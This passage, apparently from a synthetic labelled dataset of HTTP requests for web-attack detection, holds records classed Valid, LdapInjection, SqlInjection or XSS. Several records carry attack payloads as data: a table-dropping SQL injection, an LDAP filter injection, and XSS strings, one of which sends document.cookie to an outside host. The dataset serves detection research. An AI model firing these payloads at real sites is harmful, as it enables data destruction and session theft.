UA-CPU: MIPS
UA-Disp: 1652,237,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 518x165
Via: 0.9 www.qnipL.htm
Transfer-Encoding: 5eOdx; 2sqc=ajjw
Upgrade: sep9n/1.9, toxe/6.1, lpmu/3.8, a8iA/5.8, gtttil/4.9
Warning: 713 www.sdys.jpeg:780 "dc7ns" 
X-Forwarded-For: 214.165.29.201
X-Serial-Number: 28910349808
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14627
Start - Id: 20013
class: Valid
GET /7rt7eaeewm7erh/msnsadaascdeda6piham/iUP.0WV9vtz5@bXlwJN/Peg9ssRregvnBca5/oxatswt/6gqCD/nXUTAI7S3t/cUU./db1atEB9slee9Vedsjp/0s9a3.png?qahvn=3&a6Dg5xUlocation=m%25eacceptandocumentesE%248&0execXJOKc=e0edoj1jroer%3E&8G8sgGfS=tf-mOs&x6l3pps1brqt7e=nauFvhutiuexnr&hA8cderi9s=whereAloTi+5I%3FI&.binhLng7LV=05&stlivc6sno9eola=41026&5ltnp=ltzrHJ_332&qhttppxDVR=eN%295Tjd6Nconnecth&bBq@5=80 HTTP/1.1
Host: www.i99084dgi.it:49484
Connection: keep-alive
Accept: application/rtf, text/xml, audio/*;q=0.6
Accept-Charset: gb2312
Accept-Encoding: gzip;q=0.6, identity, deflate, compress, gzip;q=0.6
Accept-Language: mhHv-ifathfwm, xw-ewmsrs;q=0.2, ceheq1-esnE
Cache-Control: max-stale=4
Client-ip: 24.128.85.39
Cookie: rdm3ehTnibsm5hr=k6hG7OXG6.B;dghaiond8oeoE=bhttpsi]i;7admeQswjt=t;2pd=tiframel>h+ 57;itEis7sg=19399;ew6tisr=gfFvAU.Xq
Cookie2: $Version="39"
Date: Mon, 21 Sep 09 02:56:01 GMT
ETag: W/"hb3K6rPvSU6q_38b"
Expect: 100-continue
From: tttm@caspmmxhlg.uk
If-Modified-Since: Sun, 05 Jun 05 16:18:08 CET
If-Unmodified-Since: Tue, 04 Jul 06 18:24:02 GMT
If-Match: "Ld@27drs6Yc9cNy"
If-None-Match: *
If-Range: "x7vBihiGHe6@ELgRk-08"
Max-Forwards: 24
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Basic bnhoZEV5OnJkTmVldGk=
Authorization: Digest opaque="Al3isTt"
Range: -45,-39474,-104
Referer: http://cpmjo.cz/ghsndUsa/twGi/rdbiwe.doc
TE: chunked
Trailer: Accept-Charset
User-Agent: Mozilla/7.4 (Windows; U; Win 9x 3.2; It-in; rv:9.2.9) Gecko/41908276
UA-CPU: PowerPC
UA-Disp: 9579,194,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 428x755
Via: Iot1h/0.9 171.142.58.222
Transfer-Encoding: identity
Upgrade: lseay/2.4, Lse/2.7, cuty/4.5
Warning: 933 www.eoio.png:16177 "hIirthSs" "Tue, 06 Feb 07 23:19:23 CET"
X-Forwarded-For: 99.9.48.167
X-Serial-Number: 185531423
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20013
Start - Id: 6124
class: Valid
PUT /tzWN5e8h/Jgroup byIK/t6oqmRnlTbuPio/ehEtb5bfed/nEnky7qxuO/n8i9okok/nQG.wVK4WWV/h2yyeraetil9rlss60a/t6W/ai2h4SaxyYsz6.css? HTTP/1.0
Content-Length: 147
Content-Language: redsudhB,i,n
Content-Encoding: deflate
Content-Location: http://n7trdi.ch/ndesp0.tiff
Content-MD5: bHllT290aTh0cmlkenNOeQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 10 Dec 07 15:58:32 GMT
Last-Modified: Wed, 25 Feb 04 02:14:52 CET
Host: 173.31.61.8
Connection: keep-alive
Accept: video/*;q=0.0, audio/*;q=0.2
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.4
Accept-Language: yae-she;q=0.1, ioiazlia-wau
Cache-Control: min-fresh=8
Client-ip: 2.7.31.61
Cookie: rieart=nertidGoote;dSddOnhtto=kYgSBEqy8do;LkservicesA40ak=s37z3rnlinko@amo;infhX9irltlorej=kK.x4k@5;a1du4h=ehweeehnuhTE;J_2F6RV=:esTojw+rostdinip5h
Cookie2: $Version="0"
Date: Mon, 25 Apr 05 16:44:04 UTC
ETag: W/"LgvUzZfMgjoNvwGvu22I"
Expect: 100-continue
From: Etnnkns@tnee.fr
If-Modified-Since: Thu, 23 Aug 07 15:53:57 GMT
If-Unmodified-Since: Tue, 29 Mar 05 05:09:28 GMT
If-Match: "Y_aP-VR4-SKsOjwHp6v"
If-None-Match: *
If-Range: *
Max-Forwards: 072
MIME-Version: 7.4
Pragma: gqd='rmexuo'
Proxy-Authorization: NTLM b2xpdGR2dWVpb29laXJ1dXNldG5hbFNlbHlzMHRvYThmaWhzYWV1ZWNFZWU=
Authorization: rltnri terrT=Mutaxc
Range: -53632
Referer: http://www.hUninea.ch/eture/pbrett/Rrnydnt/eeiacin.bin
TE: trailers,chunked,trailers
Trailer: Transfer-Encoding
User-Agent: uateonb4 (rKuPk6KL; pg1@q1n)
UA-CPU: PowerPC
UA-Disp: 8680,157,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7265x3057
Via: Neqreu/1.2 31.96.129.45
Transfer-Encoding: compress
Upgrade: r1lEt/3.5, ltm/6.3
Warning: 924 www.hrht.png:4 "ieats" "Mon, 14 Dec 09 01:46:05 GMT"
X-Forwarded-For: 150.210.233.126
X-Serial-Number: 421574755242645940
----: ---------------------------------
~~~~~: ~~~~~~~~~~~

g6raOlaekBi=odhtetio8peotrts3&kR8txamatB8teii=4&eium=a-BRRDVX13n7&9a2wrhV6hooonfE=0834838&nqtli=oEc&im=21&s6=56&Teaeax4ite=ert&oeta0matr8te1e=optwh

End - Id: 6124
Start - Id: 19561
class: Valid
GET /-rS/lbji/eSD@yTw3negLTgnx-/xebphwci0eE9TbnNgalT/arem8c2m/nfaPeh/eHMG/aB8c9mf7/snomcSchpdiapM.shtml?hxhnaoU=35381&erse=ntsroaen&tEnetlnhenerxii=eba0jmddSsehNe0h&2rx=eede2imafni&ceOi=tsy3Tnuteer&Rfscwe7nO=4alRe&dstylerfChRlibzr=39&wBeMxrtajBteO=t6HXYPA&8M5HshutdownuadminnC=ns4dsqit HTTP/1.0
Host: www.NdGFn.de
Connection: Aetit
Accept: audio/*
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: sKtb-xgd;q=0.9, fes-5, 3-etsE
Cache-Control: max-stale
Client-ip: 158.64.174.242
Cookie: dpRpRlib5=fqW@IvlgVl;ruw5se=|b ll
Cookie2: $Version="0"
Date: Mon, 19 Dec 05 11:06:06 CET
ETag: W/"J0_kp2D-hp5UPgn"
Expect: emeCt
From: ogeen@6fmx.ch
If-Modified-Since: Mon, 11 Sep 06 12:33:01 UTC
If-Unmodified-Since: Wed, 09 Apr 08 09:28:54 UTC
If-Match: *
If-None-Match: *
If-Range: "5tbzeARibE4sTEQFSXL5"
Max-Forwards: 2
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Digest opaque="zaan"
Authorization: NTLM ZWphZWNvZXR2ZXJlbzNVc2JoaHVpbDBlYWFPdGl5ZHlzNHFv
Range: 187147-0990,76-,-590377
Referer: /dtuaB/heyi/iqhce7ts/hsntrsp/hcsie.mspx
TE: trailers,trailers
Trailer: Date
User-Agent: tmmi7ii
UA-CPU: MIPS
UA-Disp: 3027,9526,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 6618x440
Via: 2.1 246.214.176.226, FTP/2.6 www.nnRau.html, FTP/4.7 178.153.110.117
Transfer-Encoding: gzip
Upgrade: tecthp/7.8
Warning: 422 www.otqstT.tiff "oinoowteRnso" 
X-Forwarded-For: 194.75.244.233
X-Serial-Number: 65751401302366598
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19561
Start - Id: 2605
class: Valid
GET /systemSKqBOkhttps.jpeg?6hmutqkeaAa=xhavingkedazm&fpDd=h-sltt8document&r0iBReerssmRea=201&herdseinvants=1&o0Eulttiiese=%3Aml&A0Euaqyaet=0986&d4etrliah=reqautoexec%3D&tnob1ni=h&2bcmGimdhhgw=06766045&5tyCeuma=8&7gvE45rdrodef=7988&hssq9fio=nK_mP&nldsheshwEee=mK8pDEnFrlON&bl8yr=mrthFcsirne1tefcom HTTP/1.1
Host: 148.245.5.203
Connection: GctAm
Accept: text/*;q=0.7, video/*
Accept-Charset: windows-1254;q=0.9, macintosh;q=0.1, shift_jis, iso-8859-6
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 11.225.10.199
Cookie: CyI7EEdropusrFpaa=pEetanee;WPyN=(Gdq
Cookie2: $Version="6"
Date: Tue, 26 Jul 05 17:40:18 UTC
ETag: W/"Odn1fMbYERnDz3JfNZL"
Expect: stixncs
From: noRet8q@IsA1lAtsho.be
If-Modified-Since: Mon, 17 Apr 06 23:39:37 GMT
If-Unmodified-Since: Sat, 18 Oct 08 11:55:20 GMT
If-Match: *
If-None-Match: "upP9yhXgWgtLs8UGXk"
If-Range: "31DK_Ef5u7-M2R5O4"
Max-Forwards: 65
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Basic YXpvaG1uOmRualRveDU=
Authorization: NTLM c2VzOG83aUVvYXJsdGVjZmVsZWZ1ZWx0bXJudHk4OVY0aW5s
Range: 358055-4261
Referer: /eiv9otn/eutcvl/69Iasj8t/x9ta5/njcNo.mp3
TE: trailers
Trailer: If-Modified-Since
User-Agent: 0WbN0VyAfi http://www.atee.uk
UA-CPU: MIPS
UA-Disp: 5183,3355,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 6037x127
Via: 7.9 www.ehgta5.jpeg:315, FTP/3.1 238.211.53.109
Transfer-Encoding: gzip
Upgrade: hutie/7.1
Warning: 139 202.175.202.238:09 "if85tEa" "Sun, 03 Sep 06 18:25:51 GMT"
X-Forwarded-For: 111.117.154.17
X-Serial-Number: 9671188655936
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2605
Start - Id: 14382
class: Valid
GET /c13TE1tLIgMd.tiff?8to8yi0qmderi3=jdmotGkswuilp&Pn=%3AGCr8%3CtsnehfEuaccess_logt59h&9sirWsytot=8&5L0qg.i9HoW=lYcfq&iddit=zR6GhSeUYdo HTTP/1.0
Host: 128.201.107.43:92691
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: iso-8859-6;q=0.7, windows-1252;q=0.4, gb2312, shift_jis;q=0.5, x-mac-chinesetrad;q=0.9
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 166.239.11.152
Cookie: sioebMHuvihi7=379751;oenh2ccio=1eq0eoidte'
Cookie2: $Version="56"
Date: Thu, 27 Oct 05 17:20:32 UTC
ETag: W/"GjGgvGraJvEvMOTxn"
Expect: 100-continue
From: Esys@smxt.fr
If-Modified-Since: Wed, 19 Aug 09 19:05:33 CET
If-Unmodified-Since: Fri, 28 Mar 08 11:52:57 CET
If-Match: *
If-None-Match: "@_VS8hO9C@gH1_CJ."
If-Range: *
Max-Forwards: 176
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: n5ehm8 lhbo=Xlxnp
Authorization: Basic c2RvZW1uZXM6dGlyb0Vl
Range: -71089,-74863
Referer: http://www.g8aeu8d.com/eN8ecen/8ltsa/saacred.cgi
TE: gzip
Trailer: Accept
User-Agent: qbdjatl5valslu
UA-CPU: StrongARM
UA-Disp: 3544,5975,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 8463x313
Via: HTTP/6.6 www.seew.png, FTP/0.6 www.aEa3ag.gif
Transfer-Encoding: deflate
Upgrade: cnx/0.5, so5B/5.3, iap/9.1
Warning: 596 232.43.0.142 "o7nreoNhqvei" 
X-Forwarded-For: 224.226.145.150
X-Serial-Number: 2617540720922658779
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 14382
Start - Id: 37587
class: LdapInjection
POST /yx_jk5SpF.N7I/ajnc-AKg/4rxrlred/c6.Z5_nH/QsG@iBopt/a4.-hI/8mcoOaojh/wR/OevhNczTor/dj@.jsp? HTTP/1.1
Content-Length: 143
Content-Language: uwj,o,3zaeOvim
Content-Encoding: gzip
Content-Location: http://www.seos.net/nre5sb.pl
Content-MD5: bmxsaXFyc2dhNm5YMWVpdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 09 Oct 04 05:20:42 CET
Last-Modified: Fri, 20 Aug 04 11:52:40 CET
Host: www.btnltcroph.org
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: x-mac-arabic;q=0.8
Accept-Encoding: *
Accept-Language: lhh-gttE;q=0.4, 9Dehh-iBte;q=0.6, 0nOlN-0thoa, 222-ahos;q=0.7, n-dma
Cache-Control: no-transform
Client-ip: 229.175.84.16
Cookie: V@K@4RE.H=8ZF
Cookie2: $Version="987"
Date: Tue, 08 Aug 06 15:33:51 CET
ETag: "4f8I9U8baOZCdXJ"
Expect: 100-continue
From: Stnfsrr@eacmtr.gov
If-Modified-Since: Sat, 04 Feb 06 09:02:08 UTC
If-Unmodified-Since: Tue, 06 Jan 09 23:10:36 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 17 Dec 06 12:50:19 UTC
Max-Forwards: 538
MIME-Version: 7.0
Pragma: t='oar'
Proxy-Authorization: NTLM aTZvdWFhYXRpUjU2T2xTZW9lbnRudHdsbm9YbjRlbnJuYg==
Authorization: NTLM aXRvYXBhbnVvbFdadnBhb29zaWVscnN0dGh1dHI1bW5hYW50bGVDZXd1YWU=
Range: 9-357
Referer: /o44sn6/rdrn/hce3inh/pOn40q.mpeg
TE: deflate;q=0.6,chunked
Trailer: TE
User-Agent: Mozilla/5.4 (X11; U; Linux i386 8.9; Pe-rn; rv:4.6.5) Gecko/64618716
UA-CPU: PowerPC
UA-Disp: 1243,740,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 4454x553
Via: roimfh/2.1 199.29.172.128:4
Transfer-Encoding: gzip
Upgrade: artg/9.7, Boy/7.1, oiE/0.1, mladno/7.3, Ni9/4.6
Warning: 869 0.21.109.21 "ed5fnOh" "Tue, 30 Jan 07 20:44:43 UTC"
X-Forwarded-For: 111.32.250.246
X-Serial-Number: 35518631146538
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

WQ1rf= n>+tieamstyleahttpibsuo4 &lecenEtte1sys=tgtsefjnGRvseeoNh&y3t2en2oteey7tv=Cec)(   |   (hstna=*)&8seaeye9= heautoexeceub 

End - Id: 37587
Start - Id: 42530
class: SqlInjection
GET /gtiLEformrC85ztJ/oo5THkfiT5T@3vH6URHC/rrdoUh@b_-QI6pE17ze/d1KAlc9fmEx/gEj0Nne4d/a.vcw/uuP/X5XWLAfd/ncsdentsactlay99aPeg/xeorihsz/as46iaeI1rmei0h6lrts/thqau2UTntil6ieifu.dll?eztmndOsi=oeczTnwemttn&tssd=%27%3B+++drop+++table+++++admin&srimdlstth=eh%26acud6asfb&meraNOrhbaLYs=0wlsJSjonnrhtacces8&rTmagt=rsr+n1+e%2Beadmin%5Bpi&sjdd6emse2g=tytst&CkfhNPoe74oY=4042&era0i=Eytqagow2uau&dj=ene+nnqha&SscriptyOnKrcp9allin0r=6bqXZ&lyigubomdues=8&wafmfhssaqttp4=m9ecmshutdownc7siframei&thdstsa=ioetln9u&lloeeey=9kVC4FZ&7coitdlsrihnr=styleve HTTP/1.0
Host: 206.189.242.103:80
Connection: close
Accept: video/mpeg, text/*;q=0.2, text/plain
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-age=8193
Client-ip: 193.221.217.71
Cookie: co=Et6irIwiderEohlto;2e9ezusciqnldU=19=Rs-aaiLdj@oqdu;tTldluegheo=2930;zn0ennieuglo=gwpwptno7ad7re
Cookie2: $Version="094"
Date: Sat, 10 Jun 06 01:02:32 CET
ETag: W/"2W7s5-ENre8Dzaenr_N"
Expect: 100-continue
From: tasre@attmgeuh.ch
If-Modified-Since: Fri, 16 Oct 09 19:35:19 CET
If-Unmodified-Since: Fri, 12 Nov 04 08:02:17 GMT
If-Match: "TvaPEl6WzRDHh49DB6OI"
If-None-Match: *
If-Range: Wed, 20 May 09 24:21:17 UTC
Max-Forwards: 57
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: Digest nc=ABB8e3d4
Authorization: naiao P9E9e=cekn
Range: 6-,94342-9,9-42
Referer: /kitatqct/tNeng/athhou/rnor.swf
TE: trailers,trailers,gzip
Trailer: Via
User-Agent: Mozilla/3.3 (Windows; U; Win 9x 7.6; oo-u1; rv:5.3.3) Gecko/07721982
UA-CPU: x86
UA-Disp: 3013,748,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 8264x986
Via: riEn3/0.7 92.24.213.228, kFa/5.6 www.plsaese.js, 0.8 www.gn0enu.png
Transfer-Encoding: identity
Upgrade: hdxl/4.1, ir1i9/2.4
Warning: 039 www.rscr.js "tEodeseiset5e5eLbAid" 
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 49861
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42530
Start - Id: 18603
class: Valid
GET /sRrWekfp/e3ioub5hllrb9eay/CGU@IWm7/ga/ge36etf/tuuwtHv6oybeitAfnpnu.shtml?bstylezRRcOJB3d=trs&8fnLAlyssao=5&orralhff5s=hs&3ZIWEmDnur=%29+&tr=nbon%24&osih2h4geBm82=1Eneodc8go&sOz=btvarsj&kwisaeuhncis=ao%3E&nj=1610&yitmiohT=0iodeq&jl=0989347&oal=4lFL&bilrsshndtgezn=3481612974&4rdtst=85&IoxWeeeiinir=sApihlmig HTTP/1.1
Host: www.3pycaaeos.gov
Connection: close
Accept: image/*, text/plain;q=0.5, audio/x-wav
Accept-Charset: *
Accept-Encoding: 
Accept-Language: Vnue-a, oE-ilaphs5s;q=0.4, rrws-rTEh
Cache-Control: min-fresh=1
Client-ip: 92.140.82.89
Cookie: v3srEm9=611458535;nemeh=f h
Cookie2: $Version="5"
Date: Thu, 10 Aug 06 20:35:12 GMT
ETag: "ODDDI7QMbANBrNZGX"
Expect: pdNhf7t=de0aert
From: issa@v6tset.fr
If-Modified-Since: Mon, 21 Mar 05 02:30:20 CET
If-Unmodified-Since: Sun, 18 Mar 07 24:15:44 GMT
If-Match: *
If-None-Match: "acn8_wX9A-o6kQkyv"
If-Range: *
Max-Forwards: 601
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: NTLM ZXB1ZWJyZXJlb29jVmk1c2VocnRUYW9kdGdsdHJ0ZmVsbkd0
Authorization: 3ue85e zly9yZ9=sogieo
Range: 0-15536,8-008663
Referer: http://www.aeenA.be/Reelc/ochuhi/rteShi/oeezgw.swf
TE: chunked;q=0.7,gzip;q=0.4
Trailer: Accept
User-Agent: EwllRaeh/7.9.0
UA-CPU: MIPS
UA-Disp: 1268,0056,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 8012x674
Via: FTP/8.1 www.oeHas.png
Transfer-Encoding: gzip
Upgrade: fsooht/0.4, Rtho/8.1
Warning: 224 www.anwi.tiff:36 "snstrTt" "Mon, 04 Jun 07 16:58:27 GMT"
X-Forwarded-For: 72.228.20.6
X-Serial-Number: 74074067
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18603
Start - Id: 47729
class: XSS
GET /nEetbetsidteeiaeez/ssrIvet/aroaia5ainlDhloeers5.css?ldeL=%3C%21%5BCDATA%5B%3C%21--%5D%5D++++%3E%3Cscript++%3E%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.nsntnens.com%2Fcgi-bin%2Folll.cgi%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript++++%3E&tixaiOhlc=062511&wotaUyImia=434252&76v91v=m1vH&5hS5mtReh6a=8532822 HTTP/1.1
Host: www.htevh.be:6690
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: etmceans-urzeevn1
Cache-Control: no-cache
Client-ip: 90.114.63.204
Cookie: anxhtixi9se2I=gsytiieleeQ;eth9eedkvo3he=Eln8ecironhnmiotO;olpdo7vhEti61=r3r(;pdbNdmSauSt=e(;AVmiaeTtft4erce= l;igiogsd6nneague=aeVR4
Cookie2: $Version="02"
Date: Sun, 20 Jun 04 24:13:28 GMT
ETag: W/"HOfmfYPgzeuNvLeA"
Expect: 100-continue
From: aonie0x@uTdtewu.be
If-Modified-Since: Thu, 08 Apr 04 15:10:15 GMT
If-Unmodified-Since: Thu, 09 Sep 04 16:51:26 UTC
If-Match: "u1K2pNZvaHrB.1g_"
If-None-Match: "jnP@MXPwEfzbJiVAe@"
If-Range: Sun, 16 Nov 08 01:28:45 UTC
Max-Forwards: 1
MIME-Version: 5.9
Pragma: Ne='SeAeW'
Proxy-Authorization: Basic bW9hcmE6QWN5c2JlZXM=
Authorization: Digest uri=http://04aR.st/IpidxdeT/7eqeo/dqn0/lnugf/Dleaa.mdb
Range: 73-845,-3701,335-21836
Referer: http://www.3tkober.biz/6wo1/qenipnc.htm
TE: trailers,chunked,chunked
Trailer: Date
User-Agent: Mozilla/4.0 (Windows; U; WinNT 9.6; tn-DP; rv:4.3.0) Gecko/03530739
UA-CPU: PowerPC
UA-Disp: 2301,334,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 0710x100
Via: HTTP/3.5 128.46.66.59, 8.5 48.243.223.216, 0.0 159.87.208.196
Transfer-Encoding: gzip
Upgrade: dkl9/3.1, Y30iPN/9.5, ieat/6.0, mjwRi/1.0
Warning: 499 www.ObTif.js "Thryti" 
X-Forwarded-For: 1.179.155.203
X-Serial-Number: 89188723783
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47729
Start - Id: 1907
class: Valid
GET /a1HO-sR8Fw/snibwsuszug9oe4OCtes/bQq/tawre8u8xblt7Stl/hFXCLMjy0ootMgGYC/hwuASnat.jpg?6sispdLentbea=psdxLmmni9i&i7sr4auwluzo6=iCta&netcatumJlpAReG5=inputtmp&T_httpMdivI@FZ=yre%28b3es7weae&f2adrNowtLf=connect%5Dr&hilMrb9a=ghbhcl&epibnesdhoxC=8627&QJGXLb=oCEtntjoeaiiasock_stream&struwioehoqe0t=7900&ouaeneseteuesr=gnachildw&fYroviesaieImxs=298&tIstyleusr4MRjF=d4JikK&ion0mr4octhryr=utr5l%282sextermh%3Aotdueas&4gwhftediar=u2elmsgtgenrr9Os HTTP/1.0
Host: www.ta8few.net
Connection: close
Accept: application/zip
Accept-Charset: *
Accept-Encoding: identity;q=0.4, deflate, deflate;q=0.4, deflate;q=0.6
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 201.189.225.98
Cookie: eaac3sp=iM5Klisgnvjc;ih9hc=81715630;t8ttNo=46;5dlodvfAeefo=a5includeconnecteed3eaos;snb=fl8 ;aw7siMzdropMk=soNu
Cookie2: $Version="83"
Date: Tue, 30 Oct 07 17:46:21 CET
ETag: "5akjY@04y3w7qYSzEYDR"
Expect: neSrn4=ecsarcdw
From: chcroee@utelcE93Ia.biz
If-Modified-Since: Sat, 17 Jan 04 02:19:35 GMT
If-Unmodified-Since: Wed, 29 Aug 07 22:50:30 GMT
If-Match: *
If-None-Match: "e4bSxGLqOFmHAq7sxYD"
If-Range: *
Max-Forwards: 166
MIME-Version: 3.7
Pragma: c='eosqiree'
Proxy-Authorization: wrea ltni=8Rsiyra
Authorization: NTLM b0V3VXhCbnBybWVkWmo5bm9ub2VuYmhvYWtvZ3RoZWZlaWVvbW8xaGhjemxicg==
Range: 730007-,8569-0684
Referer: http://www.msdh.fr/tids9is/0Orciro/aqmmdfs/g4ur/dtrf3.jsp
TE: trailers
Trailer: Expect
User-Agent: ooosgO8t7 (g7ymdpkYC; kd2Aoqi2_M; nFss8sRE)
UA-CPU: PowerPC
UA-Disp: 272,378,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 594x6031
Via: HTTP/5.2 159.128.86.175, 0.2 41.3.189.240:6049
Transfer-Encoding: identity
Upgrade: olz/0.5
Warning: 924 www.bbtn.js "trtrnasnAn" 
X-Forwarded-For: 136.63.127.58
X-Serial-Number: 1247280154947
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1907
Start - Id: 34729
class: Valid
POST /eidsm/3tmaretaeohhtcres4ei/aiDMmia1uGiUtsedepc/9thnaxrhplfsigepbeO/Esshtey/afS@UyOFM/GgminsertC.htm? HTTP/1.1
Content-Length: 43
Content-Language: nAyhlt,isidrRM
Content-Encoding: gzip
Content-Location: /aR3p.sh
Content-MD5: cnlydGVTemF2cnNhYXZuZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 22 Nov 04 24:27:19 GMT
Last-Modified: Sun, 22 Mar 09 14:07:48 GMT
Host: www.etyi.uk:8
Connection: close
Accept: video/*
Accept-Charset: x-mac-arabic;q=0.3, iso-8859-8, x-mac-arabic;q=0.6, big5
Accept-Encoding: gzip;q=0.3, gzip;q=0.4, deflate, deflate, gzip
Accept-Language: vsBr-0rnih7t, aapa-eSwndtmw
Cache-Control: min-fresh=9
Client-ip: 63.100.109.215
Cookie: hezm1eE6aiAEd=dprh8nwn
Cookie2: $Version="817"
Date: Fri, 29 Jun 07 07:51:20 GMT
ETag: W/"tvaIz-1JxMiRT1iZc"
Expect: 100-continue
From: tIeiaSrs@eek7eEs.com
If-Modified-Since: Sun, 24 Feb 08 09:04:11 GMT
If-Unmodified-Since: Sun, 07 May 06 22:56:00 CET
If-Match: "KHsg5NeOfZcz9zciN"
If-None-Match: "k5b9lTzcnXotRmfI"
If-Range: "MsxvZhFqi8qhsG1U87wU"
Max-Forwards: 5816
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Basic bmlHR3BwOm9XbW1NZ28=
Authorization: te1odf tiidr=H26tf
Range: 27601-82680,576792-311040,-975285
Referer: http://www.j6lfE0.biz/CiOhhihr.cfm
TE: deflate,gzip
Trailer: If-Unmodified-Since
User-Agent: Mozilla/9.5 (X11; U; Open BSD i386 9.2; le-rS; rv:0.9.7) Gecko/74314835
UA-CPU: x86
UA-Disp: 497,2476,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 420x8395
Via: 3.2 www.8wuny.jpg
Transfer-Encoding: shyeea; vbtg=jodphNyr
Upgrade: btCas3/7.1
Warning: 037 www.hherAoqh.shtml "Nsboaotl5osqnnpngxrn" "Fri, 28 Aug 09 18:01:13 GMT"
X-Forwarded-For: 102.210.121.17
X-Serial-Number: 8267769973
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

74rp6u=homepcbr&X_F23T77passthruJ@V=hiut8Ug

End - Id: 34729
Start - Id: 47257
class: XSS
GET /txha.imTbN/hehS1E/ePFflz2EQkztbE84laHx/vVB0ZFtGURLtct1G9u/toccawjmex/eparj-o8v/QpjWLkRsconnecthCGBZ.asmx?oi9astais=admin%7Ce0i%3BE%7EsnsiI1k%7C&hho=e-1Dj&2BHr8ZDe8=iofn&diiorhfd=socaUlQesamti5&ninooen=e5eT&eTmerd9itk=tI8&srmaly0=n8itmpnN%26Ah%7Ci&ferewiuhioE=Ioht11accept%29H+a&iehonR1U=npbr7i%3Awte%3Eformwu5%3B%3Bed&a4=hc&4iaA=%3Cxml+++id++%3D+++%22+X%22%3E%3Ca+++%3E%3Cb%3E%26lt%3Bscript+++%3E%5Balert+%28%27tcsees%27%29%3B%5D%26lt%3B%2Fscript%3E%3B%3C%2Fb++++%3E%3C%2Fa++++%3E%3C%2Fxml%3E&hl8e8l=388191&xai=E7cccl&0rw=89&Kvn0gosee=toNj%3A HTTP/1.0
Host: 129.4.18.87
Connection: close
Accept: video/*;q=0.3, image/*;q=0.4
Accept-Charset: iso-8859-7;q=0.2, x-mac-roman, utf-7;q=0.1, windows-1257;q=0.7
Accept-Encoding: deflate, deflate, identity, identity
Accept-Language: 8rr0hutc-2o6qsip, irws-erjEen, 4hJrsr3i-8rnu;q=0.8, nmNo-leO
Cache-Control: no-transform
Client-ip: 10.37.184.28
Cookie: Sidn0odethlk8o=nXNl8Gk;hhcamsolkfxx=rxrjdsnS;5i3ealHl=unneee;toraee6s6idf=4671529;xdip=jxSqc
Cookie2: $Version="945"
Date: Sun, 27 Mar 05 06:57:26 UTC
ETag: W/"q0-hAtnazO7nbLaKys"
Expect: 100-continue
From: mP8eatM@krgt.fr
If-Modified-Since: Tue, 11 Sep 07 15:28:44 GMT
If-Unmodified-Since: Tue, 25 Mar 08 15:51:56 CET
If-Match: "loZCQXzn._kdkIhcZauH"
If-None-Match: "qAvsBsEgX6ppumTUl"
If-Range: Tue, 29 Jul 08 12:19:15 GMT
Max-Forwards: 70
MIME-Version: 3.6
Pragma: aoTec='ois'
Proxy-Authorization: 6ndit medexEq=belmLsj
Authorization: NTLM YWRibm9hY2VteWVueWVpaXRzbzZyZTV0b2Jwenl0VzVjeWxpaWVsc2E=
Range: 074719-95,6-
Referer: http://www.Fedd.biz/2igqfiq.jsp
TE: chunked;q=0.4
Trailer: Warning
User-Agent: o1gzaienienmxoibynr
UA-CPU: StrongARM
UA-Disp: 571,3575,8
UA-OS: Linux
